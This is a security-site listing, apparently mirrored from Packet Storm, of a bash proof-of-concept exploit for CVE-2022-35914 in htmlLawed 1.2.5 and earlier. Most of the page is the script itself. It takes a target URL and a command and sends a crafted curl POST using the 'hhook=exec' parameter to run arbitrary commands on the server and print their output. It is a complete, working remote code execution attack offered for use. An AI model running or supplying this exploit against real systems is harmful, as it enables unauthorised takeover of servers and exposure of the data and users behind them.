htmlLawed 1.2.5 Remote Command Execution
2024-5-2 21:49:42 Author: packetstormsecurity.com(查看原文) 阅读量:4 收藏
htmlLawed 1.2.5 Remote Command Execution
Posted May 2, 2024
Authored by d4t4s3c

htmlLawed versions 1.2.5 and below proof of concept remote command execution exploit.

tags | exploit, remote, proof of concept
advisories | CVE-2022-35914
SHA-256 | f7c13b91b7562803551ff2c81af4d91f8007cf734173bc191c1002abafa0fa8f
Download | Favorite | View
#!/bin/bash
# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution
# Date: 2024-05-02
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
# Software Link: https://github.com/kesar/HTMLawed
# Version: <= 1.2.5
# Tested on: Linux
# Category: Web Application
# CVE: CVE-2022-35914
while getopts ":u:c:" arg; do
  case ${arg} in
    u) url=${OPTARG}; let parameter_counter+=1 ;;
    c) cmd=${OPTARG}; let parameter_counter+=1 ;;
  esac
done
if [ -z "${url}" ] || [ -z "${cmd}" ]; then
  echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"
  echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n"
  exit 1
else
  echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"
  echo -e "\n[+] Executing Command: ${cmd}\n"
  cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\&nbsp; \[[0-9]+\] =\>' | sed -E 's/\&nbsp; \[[0-9]+\] =\> (.*)<br \/>/\1/')
  echo -e "${cmd_output}\n"
  exit 0
fi

File Tags

Systems


文章来源: https://packetstormsecurity.com/files/178425/CVE-2022-35914.sh.txt
如有侵权请联系:admin#unsafe.sh